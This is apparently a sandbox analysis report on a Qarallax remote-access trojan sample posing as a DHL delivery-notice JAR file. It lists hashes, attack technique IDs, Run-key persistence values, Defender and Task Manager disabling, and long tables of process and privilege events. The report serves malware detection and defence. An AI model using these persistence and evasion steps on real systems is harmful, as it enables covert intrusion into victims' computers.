qarallax | 4978e38561ad475d2222684679af717a9f864420c4893d00c74f4d7790e1f8c5

Analysis

max time kernel
55s
max time network
138s
platform
windows7_x64
resource
win7
submitted
20-08-2020 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NOTIFICA DI ARRIVO DHL_PDF.jar
Size

411KB
MD5

07a44afbee3453588d1cd6724b53933c
SHA1

0e635ec400e5fb8d68e5d21db1362f898df3ec73
SHA256

4978e38561ad475d2222684679af717a9f864420c4893d00c74f4d7790e1f8c5
SHA512

c3b3b80162224b3de18cca40f7c59c15235910b4ea367d98022babfea0a893495da973096f5ca7e647866520d147f2de9be7a5637ae93a4dcaf7deefac9f7805

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x0003000000013553-7.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
672	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\xRyFi	java.exe
File created	C:\Windows\System32\xRyFi	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
2308	taskkill.exe
1888	taskkill.exe
1924	taskkill.exe
1948	taskkill.exe
2404	taskkill.exe
2452	taskkill.exe
1476	taskkill.exe
1636	taskkill.exe
2356	taskkill.exe
1900	taskkill.exe
1984	taskkill.exe
360	taskkill.exe
1696	taskkill.exe
1876	taskkill.exe
368	taskkill.exe
2500	taskkill.exe
548	taskkill.exe
1476	taskkill.exe
1780	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2040	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 140 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe
Token: SeManageVolumePrivilege	1272	WMIC.exe
Token: 33	1272	WMIC.exe
Token: 34	1272	WMIC.exe
Token: 35	1272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe
Token: SeManageVolumePrivilege	1272	WMIC.exe
Token: 33	1272	WMIC.exe
Token: 34	1272	WMIC.exe
Token: 35	1272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1868	WMIC.exe
Token: SeSecurityPrivilege	1868	WMIC.exe
Token: SeTakeOwnershipPrivilege	1868	WMIC.exe
Token: SeLoadDriverPrivilege	1868	WMIC.exe
Token: SeSystemProfilePrivilege	1868	WMIC.exe
Token: SeSystemtimePrivilege	1868	WMIC.exe
Token: SeProfSingleProcessPrivilege	1868	WMIC.exe
Token: SeIncBasePriorityPrivilege	1868	WMIC.exe
Token: SeCreatePagefilePrivilege	1868	WMIC.exe
Token: SeBackupPrivilege	1868	WMIC.exe
Token: SeRestorePrivilege	1868	WMIC.exe
Token: SeShutdownPrivilege	1868	WMIC.exe
Token: SeDebugPrivilege	1868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1868	WMIC.exe
Token: SeRemoteShutdownPrivilege	1868	WMIC.exe
Token: SeUndockPrivilege	1868	WMIC.exe
Token: SeManageVolumePrivilege	1868	WMIC.exe
Token: 33	1868	WMIC.exe
Token: 34	1868	WMIC.exe
Token: 35	1868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1868	WMIC.exe
Token: SeSecurityPrivilege	1868	WMIC.exe
Token: SeTakeOwnershipPrivilege	1868	WMIC.exe
Token: SeLoadDriverPrivilege	1868	WMIC.exe
Token: SeSystemProfilePrivilege	1868	WMIC.exe
Token: SeSystemtimePrivilege	1868	WMIC.exe
Token: SeProfSingleProcessPrivilege	1868	WMIC.exe
Token: SeIncBasePriorityPrivilege	1868	WMIC.exe
Token: SeCreatePagefilePrivilege	1868	WMIC.exe
Token: SeBackupPrivilege	1868	WMIC.exe
Token: SeRestorePrivilege	1868	WMIC.exe
Token: SeShutdownPrivilege	1868	WMIC.exe
Token: SeDebugPrivilege	1868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1868	WMIC.exe
Token: SeRemoteShutdownPrivilege	1868	WMIC.exe
Token: SeUndockPrivilege	1868	WMIC.exe
Token: SeManageVolumePrivilege	1868	WMIC.exe
Token: 33	1868	WMIC.exe
Token: 34	1868	WMIC.exe
Token: 35	1868	WMIC.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	2308	taskkill.exe
Token: SeDebugPrivilege	2356	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
672	java.exe

Suspicious use of WriteProcessMemory 804 IoCs

description	pid	Process	procid_target
PID 672 wrote to memory of 1524	672	java.exe	25
PID 672 wrote to memory of 1524	672	java.exe	25
PID 672 wrote to memory of 1524	672	java.exe	25
PID 672 wrote to memory of 1680	672	java.exe	26
PID 672 wrote to memory of 1680	672	java.exe	26
PID 672 wrote to memory of 1680	672	java.exe	26
PID 1680 wrote to memory of 1272	1680	cmd.exe	27
PID 1680 wrote to memory of 1272	1680	cmd.exe	27
PID 1680 wrote to memory of 1272	1680	cmd.exe	27
PID 672 wrote to memory of 1760	672	java.exe	28
PID 672 wrote to memory of 1760	672	java.exe	28
PID 672 wrote to memory of 1760	672	java.exe	28
PID 1760 wrote to memory of 1868	1760	cmd.exe	29
PID 1760 wrote to memory of 1868	1760	cmd.exe	29
PID 1760 wrote to memory of 1868	1760	cmd.exe	29
PID 672 wrote to memory of 1892	672	java.exe	30
PID 672 wrote to memory of 1892	672	java.exe	30
PID 672 wrote to memory of 1892	672	java.exe	30
PID 672 wrote to memory of 1908	672	java.exe	31
PID 672 wrote to memory of 1908	672	java.exe	31
PID 672 wrote to memory of 1908	672	java.exe	31
PID 672 wrote to memory of 1936	672	java.exe	32
PID 672 wrote to memory of 1936	672	java.exe	32
PID 672 wrote to memory of 1936	672	java.exe	32
PID 672 wrote to memory of 1948	672	java.exe	33
PID 672 wrote to memory of 1948	672	java.exe	33
PID 672 wrote to memory of 1948	672	java.exe	33
PID 672 wrote to memory of 1844	672	java.exe	34
PID 672 wrote to memory of 1844	672	java.exe	34
PID 672 wrote to memory of 1844	672	java.exe	34
PID 672 wrote to memory of 1840	672	java.exe	35
PID 672 wrote to memory of 1840	672	java.exe	35
PID 672 wrote to memory of 1840	672	java.exe	35
PID 672 wrote to memory of 1752	672	java.exe	36
PID 672 wrote to memory of 1752	672	java.exe	36
PID 672 wrote to memory of 1752	672	java.exe	36
PID 672 wrote to memory of 1636	672	java.exe	37
PID 672 wrote to memory of 1636	672	java.exe	37
PID 672 wrote to memory of 1636	672	java.exe	37
PID 672 wrote to memory of 1580	672	java.exe	38
PID 672 wrote to memory of 1580	672	java.exe	38
PID 672 wrote to memory of 1580	672	java.exe	38
PID 672 wrote to memory of 1972	672	java.exe	39
PID 672 wrote to memory of 1972	672	java.exe	39
PID 672 wrote to memory of 1972	672	java.exe	39
PID 672 wrote to memory of 2012	672	java.exe	40
PID 672 wrote to memory of 2012	672	java.exe	40
PID 672 wrote to memory of 2012	672	java.exe	40
PID 672 wrote to memory of 1984	672	java.exe	41
PID 672 wrote to memory of 1984	672	java.exe	41
PID 672 wrote to memory of 1984	672	java.exe	41
PID 1580 wrote to memory of 1976	1580	cmd.exe	42
PID 1580 wrote to memory of 1976	1580	cmd.exe	42
PID 1580 wrote to memory of 1976	1580	cmd.exe	42
PID 1580 wrote to memory of 1184	1580	cmd.exe	43
PID 1580 wrote to memory of 1184	1580	cmd.exe	43
PID 1580 wrote to memory of 1184	1580	cmd.exe	43
PID 672 wrote to memory of 2040	672	java.exe	44
PID 672 wrote to memory of 2040	672	java.exe	44
PID 672 wrote to memory of 2040	672	java.exe	44
PID 672 wrote to memory of 2028	672	java.exe	46
PID 672 wrote to memory of 2028	672	java.exe	46
PID 672 wrote to memory of 2028	672	java.exe	46
PID 672 wrote to memory of 992	672	java.exe	48
PID 672 wrote to memory of 992	672	java.exe	48
PID 672 wrote to memory of 992	672	java.exe	48
PID 672 wrote to memory of 676	672	java.exe	52
PID 672 wrote to memory of 676	672	java.exe	52
PID 672 wrote to memory of 676	672	java.exe	52
PID 676 wrote to memory of 1224	676	cmd.exe	53
PID 676 wrote to memory of 1224	676	cmd.exe	53
PID 676 wrote to memory of 1224	676	cmd.exe	53
PID 672 wrote to memory of 1420	672	java.exe	54
PID 672 wrote to memory of 1420	672	java.exe	54
PID 672 wrote to memory of 1420	672	java.exe	54
PID 672 wrote to memory of 1492	672	java.exe	56
PID 672 wrote to memory of 1492	672	java.exe	56
PID 672 wrote to memory of 1492	672	java.exe	56
PID 676 wrote to memory of 568	676	cmd.exe	58
PID 676 wrote to memory of 568	676	cmd.exe	58
PID 676 wrote to memory of 568	676	cmd.exe	58
PID 672 wrote to memory of 1044	672	java.exe	59
PID 672 wrote to memory of 1044	672	java.exe	59
PID 672 wrote to memory of 1044	672	java.exe	59
PID 672 wrote to memory of 1788	672	java.exe	60
PID 672 wrote to memory of 1788	672	java.exe	60
PID 672 wrote to memory of 1788	672	java.exe	60
PID 672 wrote to memory of 1272	672	java.exe	61
PID 672 wrote to memory of 1272	672	java.exe	61
PID 672 wrote to memory of 1272	672	java.exe	61
PID 672 wrote to memory of 1888	672	java.exe	63
PID 672 wrote to memory of 1888	672	java.exe	63
PID 672 wrote to memory of 1888	672	java.exe	63
PID 672 wrote to memory of 1536	672	java.exe	65
PID 672 wrote to memory of 1536	672	java.exe	65
PID 672 wrote to memory of 1536	672	java.exe	65
PID 1788 wrote to memory of 1896	1788	cmd.exe	66
PID 1788 wrote to memory of 1896	1788	cmd.exe	66
PID 1788 wrote to memory of 1896	1788	cmd.exe	66
PID 672 wrote to memory of 1928	672	java.exe	68
PID 672 wrote to memory of 1928	672	java.exe	68
PID 672 wrote to memory of 1928	672	java.exe	68
PID 1788 wrote to memory of 1832	1788	cmd.exe	70
PID 1788 wrote to memory of 1832	1788	cmd.exe	70
PID 1788 wrote to memory of 1832	1788	cmd.exe	70
PID 672 wrote to memory of 1528	672	java.exe	71
PID 672 wrote to memory of 1528	672	java.exe	71
PID 672 wrote to memory of 1528	672	java.exe	71
PID 672 wrote to memory of 2032	672	java.exe	73
PID 672 wrote to memory of 2032	672	java.exe	73
PID 672 wrote to memory of 2032	672	java.exe	73
PID 672 wrote to memory of 1016	672	java.exe	74
PID 672 wrote to memory of 1016	672	java.exe	74
PID 672 wrote to memory of 1016	672	java.exe	74
PID 2032 wrote to memory of 472	2032	cmd.exe	76
PID 2032 wrote to memory of 472	2032	cmd.exe	76
PID 2032 wrote to memory of 472	2032	cmd.exe	76
PID 672 wrote to memory of 828	672	java.exe	77
PID 672 wrote to memory of 828	672	java.exe	77
PID 672 wrote to memory of 828	672	java.exe	77
PID 672 wrote to memory of 1172	672	java.exe	80
PID 672 wrote to memory of 1172	672	java.exe	80
PID 672 wrote to memory of 1172	672	java.exe	80
PID 672 wrote to memory of 548	672	java.exe	82
PID 672 wrote to memory of 548	672	java.exe	82
PID 672 wrote to memory of 548	672	java.exe	82
PID 672 wrote to memory of 436	672	java.exe	83
PID 672 wrote to memory of 436	672	java.exe	83
PID 672 wrote to memory of 436	672	java.exe	83
PID 672 wrote to memory of 1908	672	java.exe	85
PID 672 wrote to memory of 1908	672	java.exe	85
PID 672 wrote to memory of 1908	672	java.exe	85
PID 672 wrote to memory of 1752	672	java.exe	87
PID 672 wrote to memory of 1752	672	java.exe	87
PID 672 wrote to memory of 1752	672	java.exe	87
PID 672 wrote to memory of 1492	672	java.exe	91
PID 672 wrote to memory of 1492	672	java.exe	91
PID 672 wrote to memory of 1492	672	java.exe	91
PID 672 wrote to memory of 1784	672	java.exe	92
PID 672 wrote to memory of 1784	672	java.exe	92
PID 672 wrote to memory of 1784	672	java.exe	92
PID 672 wrote to memory of 1184	672	java.exe	94
PID 672 wrote to memory of 1184	672	java.exe	94
PID 672 wrote to memory of 1184	672	java.exe	94
PID 672 wrote to memory of 1900	672	java.exe	96
PID 672 wrote to memory of 1900	672	java.exe	96
PID 672 wrote to memory of 1900	672	java.exe	96
PID 2032 wrote to memory of 1852	2032	cmd.exe	97
PID 2032 wrote to memory of 1852	2032	cmd.exe	97
PID 2032 wrote to memory of 1852	2032	cmd.exe	97
PID 672 wrote to memory of 1632	672	java.exe	98
PID 672 wrote to memory of 1632	672	java.exe	98
PID 672 wrote to memory of 1632	672	java.exe	98
PID 672 wrote to memory of 2016	672	java.exe	100
PID 672 wrote to memory of 2016	672	java.exe	100
PID 672 wrote to memory of 2016	672	java.exe	100
PID 672 wrote to memory of 1044	672	java.exe	101
PID 672 wrote to memory of 1044	672	java.exe	101
PID 672 wrote to memory of 1044	672	java.exe	101
PID 672 wrote to memory of 1472	672	java.exe	105
PID 672 wrote to memory of 1472	672	java.exe	105
PID 672 wrote to memory of 1472	672	java.exe	105
PID 672 wrote to memory of 1816	672	java.exe	106
PID 672 wrote to memory of 1816	672	java.exe	106
PID 672 wrote to memory of 1816	672	java.exe	106
PID 672 wrote to memory of 556	672	java.exe	107
PID 672 wrote to memory of 556	672	java.exe	107
PID 672 wrote to memory of 556	672	java.exe	107
PID 672 wrote to memory of 2044	672	java.exe	109
PID 672 wrote to memory of 2044	672	java.exe	109
PID 672 wrote to memory of 2044	672	java.exe	109
PID 672 wrote to memory of 1476	672	java.exe	111
PID 672 wrote to memory of 1476	672	java.exe	111
PID 672 wrote to memory of 1476	672	java.exe	111
PID 672 wrote to memory of 1524	672	java.exe	113
PID 672 wrote to memory of 1524	672	java.exe	113
PID 672 wrote to memory of 1524	672	java.exe	113
PID 672 wrote to memory of 1948	672	java.exe	114
PID 672 wrote to memory of 1948	672	java.exe	114
PID 672 wrote to memory of 1948	672	java.exe	114
PID 556 wrote to memory of 1764	556	cmd.exe	115
PID 556 wrote to memory of 1764	556	cmd.exe	115
PID 556 wrote to memory of 1764	556	cmd.exe	115
PID 672 wrote to memory of 436	672	java.exe	119
PID 672 wrote to memory of 436	672	java.exe	119
PID 672 wrote to memory of 436	672	java.exe	119
PID 556 wrote to memory of 1460	556	cmd.exe	121
PID 556 wrote to memory of 1460	556	cmd.exe	121
PID 556 wrote to memory of 1460	556	cmd.exe	121
PID 672 wrote to memory of 1652	672	java.exe	122
PID 672 wrote to memory of 1652	672	java.exe	122
PID 672 wrote to memory of 1652	672	java.exe	122
PID 672 wrote to memory of 1416	672	java.exe	125
PID 672 wrote to memory of 1416	672	java.exe	125
PID 672 wrote to memory of 1416	672	java.exe	125
PID 672 wrote to memory of 1860	672	java.exe	126
PID 672 wrote to memory of 1860	672	java.exe	126
PID 672 wrote to memory of 1860	672	java.exe	126
PID 1860 wrote to memory of 2028	1860	cmd.exe	128
PID 1860 wrote to memory of 2028	1860	cmd.exe	128
PID 1860 wrote to memory of 2028	1860	cmd.exe	128
PID 1860 wrote to memory of 1880	1860	cmd.exe	129
PID 1860 wrote to memory of 1880	1860	cmd.exe	129
PID 1860 wrote to memory of 1880	1860	cmd.exe	129
PID 672 wrote to memory of 1836	672	java.exe	131
PID 672 wrote to memory of 1836	672	java.exe	131
PID 672 wrote to memory of 1836	672	java.exe	131
PID 672 wrote to memory of 1396	672	java.exe	132
PID 672 wrote to memory of 1396	672	java.exe	132
PID 672 wrote to memory of 1396	672	java.exe	132
PID 1396 wrote to memory of 2016	1396	cmd.exe	133
PID 1396 wrote to memory of 2016	1396	cmd.exe	133
PID 1396 wrote to memory of 2016	1396	cmd.exe	133
PID 672 wrote to memory of 1924	672	java.exe	134
PID 672 wrote to memory of 1924	672	java.exe	134
PID 672 wrote to memory of 1924	672	java.exe	134
PID 1836 wrote to memory of 1568	1836	cmd.exe	135
PID 1836 wrote to memory of 1568	1836	cmd.exe	135
PID 1836 wrote to memory of 1568	1836	cmd.exe	135
PID 1396 wrote to memory of 1816	1396	cmd.exe	137
PID 1396 wrote to memory of 1816	1396	cmd.exe	137
PID 1396 wrote to memory of 1816	1396	cmd.exe	137
PID 672 wrote to memory of 1564	672	java.exe	138
PID 672 wrote to memory of 1564	672	java.exe	138
PID 672 wrote to memory of 1564	672	java.exe	138
PID 1564 wrote to memory of 1124	1564	cmd.exe	139
PID 1564 wrote to memory of 1124	1564	cmd.exe	139
PID 1564 wrote to memory of 1124	1564	cmd.exe	139
PID 1564 wrote to memory of 1656	1564	cmd.exe	140
PID 1564 wrote to memory of 1656	1564	cmd.exe	140
PID 1564 wrote to memory of 1656	1564	cmd.exe	140
PID 672 wrote to memory of 1556	672	java.exe	141
PID 672 wrote to memory of 1556	672	java.exe	141
PID 672 wrote to memory of 1556	672	java.exe	141
PID 1556 wrote to memory of 1704	1556	cmd.exe	142
PID 1556 wrote to memory of 1704	1556	cmd.exe	142
PID 1556 wrote to memory of 1704	1556	cmd.exe	142
PID 1556 wrote to memory of 568	1556	cmd.exe	143
PID 1556 wrote to memory of 568	1556	cmd.exe	143
PID 1556 wrote to memory of 568	1556	cmd.exe	143
PID 672 wrote to memory of 2044	672	java.exe	144
PID 672 wrote to memory of 2044	672	java.exe	144
PID 672 wrote to memory of 2044	672	java.exe	144
PID 2044 wrote to memory of 992	2044	cmd.exe	145
PID 2044 wrote to memory of 992	2044	cmd.exe	145
PID 2044 wrote to memory of 992	2044	cmd.exe	145
PID 2044 wrote to memory of 1524	2044	cmd.exe	146
PID 2044 wrote to memory of 1524	2044	cmd.exe	146
PID 2044 wrote to memory of 1524	2044	cmd.exe	146
PID 672 wrote to memory of 1016	672	java.exe	147
PID 672 wrote to memory of 1016	672	java.exe	147
PID 672 wrote to memory of 1016	672	java.exe	147
PID 1016 wrote to memory of 1424	1016	cmd.exe	148
PID 1016 wrote to memory of 1424	1016	cmd.exe	148
PID 1016 wrote to memory of 1424	1016	cmd.exe	148
PID 1016 wrote to memory of 608	1016	cmd.exe	149
PID 1016 wrote to memory of 608	1016	cmd.exe	149
PID 1016 wrote to memory of 608	1016	cmd.exe	149
PID 672 wrote to memory of 1420	672	java.exe	150
PID 672 wrote to memory of 1420	672	java.exe	150
PID 672 wrote to memory of 1420	672	java.exe	150
PID 672 wrote to memory of 1948	672	java.exe	151
PID 672 wrote to memory of 1948	672	java.exe	151
PID 672 wrote to memory of 1948	672	java.exe	151
PID 1420 wrote to memory of 2016	1420	cmd.exe	153
PID 1420 wrote to memory of 2016	1420	cmd.exe	153
PID 1420 wrote to memory of 2016	1420	cmd.exe	153
PID 1420 wrote to memory of 524	1420	cmd.exe	154
PID 1420 wrote to memory of 524	1420	cmd.exe	154
PID 1420 wrote to memory of 524	1420	cmd.exe	154
PID 672 wrote to memory of 1472	672	java.exe	155
PID 672 wrote to memory of 1472	672	java.exe	155
PID 672 wrote to memory of 1472	672	java.exe	155
PID 1472 wrote to memory of 1872	1472	cmd.exe	156
PID 1472 wrote to memory of 1872	1472	cmd.exe	156
PID 1472 wrote to memory of 1872	1472	cmd.exe	156
PID 1472 wrote to memory of 1524	1472	cmd.exe	157
PID 1472 wrote to memory of 1524	1472	cmd.exe	157
PID 1472 wrote to memory of 1524	1472	cmd.exe	157
PID 672 wrote to memory of 1904	672	java.exe	158
PID 672 wrote to memory of 1904	672	java.exe	158
PID 672 wrote to memory of 1904	672	java.exe	158
PID 1904 wrote to memory of 1960	1904	cmd.exe	159
PID 1904 wrote to memory of 1960	1904	cmd.exe	159
PID 1904 wrote to memory of 1960	1904	cmd.exe	159
PID 1904 wrote to memory of 524	1904	cmd.exe	160
PID 1904 wrote to memory of 524	1904	cmd.exe	160
PID 1904 wrote to memory of 524	1904	cmd.exe	160
PID 672 wrote to memory of 1084	672	java.exe	161
PID 672 wrote to memory of 1084	672	java.exe	161
PID 672 wrote to memory of 1084	672	java.exe	161
PID 1084 wrote to memory of 2028	1084	cmd.exe	162
PID 1084 wrote to memory of 2028	1084	cmd.exe	162
PID 1084 wrote to memory of 2028	1084	cmd.exe	162
PID 1084 wrote to memory of 1688	1084	cmd.exe	163
PID 1084 wrote to memory of 1688	1084	cmd.exe	163
PID 1084 wrote to memory of 1688	1084	cmd.exe	163
PID 672 wrote to memory of 1592	672	java.exe	164
PID 672 wrote to memory of 1592	672	java.exe	164
PID 672 wrote to memory of 1592	672	java.exe	164
PID 1592 wrote to memory of 1864	1592	cmd.exe	165
PID 1592 wrote to memory of 1864	1592	cmd.exe	165
PID 1592 wrote to memory of 1864	1592	cmd.exe	165
PID 1592 wrote to memory of 1856	1592	cmd.exe	166
PID 1592 wrote to memory of 1856	1592	cmd.exe	166
PID 1592 wrote to memory of 1856	1592	cmd.exe	166
PID 672 wrote to memory of 1224	672	java.exe	167
PID 672 wrote to memory of 1224	672	java.exe	167
PID 672 wrote to memory of 1224	672	java.exe	167
PID 672 wrote to memory of 1780	672	java.exe	168
PID 672 wrote to memory of 1780	672	java.exe	168
PID 672 wrote to memory of 1780	672	java.exe	168
PID 1224 wrote to memory of 1792	1224	cmd.exe	170
PID 1224 wrote to memory of 1792	1224	cmd.exe	170
PID 1224 wrote to memory of 1792	1224	cmd.exe	170
PID 1224 wrote to memory of 316	1224	cmd.exe	171
PID 1224 wrote to memory of 316	1224	cmd.exe	171
PID 1224 wrote to memory of 316	1224	cmd.exe	171
PID 672 wrote to memory of 2020	672	java.exe	172
PID 672 wrote to memory of 2020	672	java.exe	172
PID 672 wrote to memory of 2020	672	java.exe	172
PID 2020 wrote to memory of 1620	2020	cmd.exe	173
PID 2020 wrote to memory of 1620	2020	cmd.exe	173
PID 2020 wrote to memory of 1620	2020	cmd.exe	173
PID 2020 wrote to memory of 1408	2020	cmd.exe	174
PID 2020 wrote to memory of 1408	2020	cmd.exe	174
PID 2020 wrote to memory of 1408	2020	cmd.exe	174
PID 672 wrote to memory of 1304	672	java.exe	175
PID 672 wrote to memory of 1304	672	java.exe	175
PID 672 wrote to memory of 1304	672	java.exe	175
PID 1304 wrote to memory of 472	1304	cmd.exe	176
PID 1304 wrote to memory of 472	1304	cmd.exe	176
PID 1304 wrote to memory of 472	1304	cmd.exe	176
PID 1304 wrote to memory of 1876	1304	cmd.exe	177
PID 1304 wrote to memory of 1876	1304	cmd.exe	177
PID 1304 wrote to memory of 1876	1304	cmd.exe	177
PID 672 wrote to memory of 1656	672	java.exe	178
PID 672 wrote to memory of 1656	672	java.exe	178
PID 672 wrote to memory of 1656	672	java.exe	178
PID 1656 wrote to memory of 1832	1656	cmd.exe	179
PID 1656 wrote to memory of 1832	1656	cmd.exe	179
PID 1656 wrote to memory of 1832	1656	cmd.exe	179
PID 1656 wrote to memory of 1872	1656	cmd.exe	180
PID 1656 wrote to memory of 1872	1656	cmd.exe	180
PID 1656 wrote to memory of 1872	1656	cmd.exe	180
PID 672 wrote to memory of 360	672	java.exe	181
PID 672 wrote to memory of 360	672	java.exe	181
PID 672 wrote to memory of 360	672	java.exe	181
PID 672 wrote to memory of 1828	672	java.exe	182
PID 672 wrote to memory of 1828	672	java.exe	182
PID 672 wrote to memory of 1828	672	java.exe	182
PID 1828 wrote to memory of 1856	1828	cmd.exe	183
PID 1828 wrote to memory of 1856	1828	cmd.exe	183
PID 1828 wrote to memory of 1856	1828	cmd.exe	183
PID 1828 wrote to memory of 1948	1828	cmd.exe	185
PID 1828 wrote to memory of 1948	1828	cmd.exe	185
PID 1828 wrote to memory of 1948	1828	cmd.exe	185
PID 672 wrote to memory of 1824	672	java.exe	186
PID 672 wrote to memory of 1824	672	java.exe	186
PID 672 wrote to memory of 1824	672	java.exe	186
PID 1824 wrote to memory of 1864	1824	cmd.exe	187
